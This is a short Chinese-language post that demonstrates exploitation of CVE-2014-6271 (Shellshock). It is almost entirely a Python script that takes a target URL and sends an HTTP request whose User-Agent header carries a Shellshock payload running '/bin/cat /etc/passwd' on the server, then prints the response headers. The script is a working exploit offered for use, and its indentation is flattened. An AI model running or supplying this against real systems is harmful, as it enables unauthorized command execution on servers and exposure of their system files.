一、演示一下CVE-2014-6271的利用效果
二、代码+注释
import requests
import argparse
# 获取参数
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest="url")
args = parser.parse_args()
url = args.url
# 设置headers,进行验证
headers = {'user-agent': '() { :;}; echo `/bin/cat /etc/passwd`'}
try:
r = requests.get(url, headers=headers)
if(r.status_code == requests.codes.ok):
dict_r = r.headers.items()
for key, value in dict_r:
print("{}: {}".format(key, value))
except Exception as e:
print(str(e))
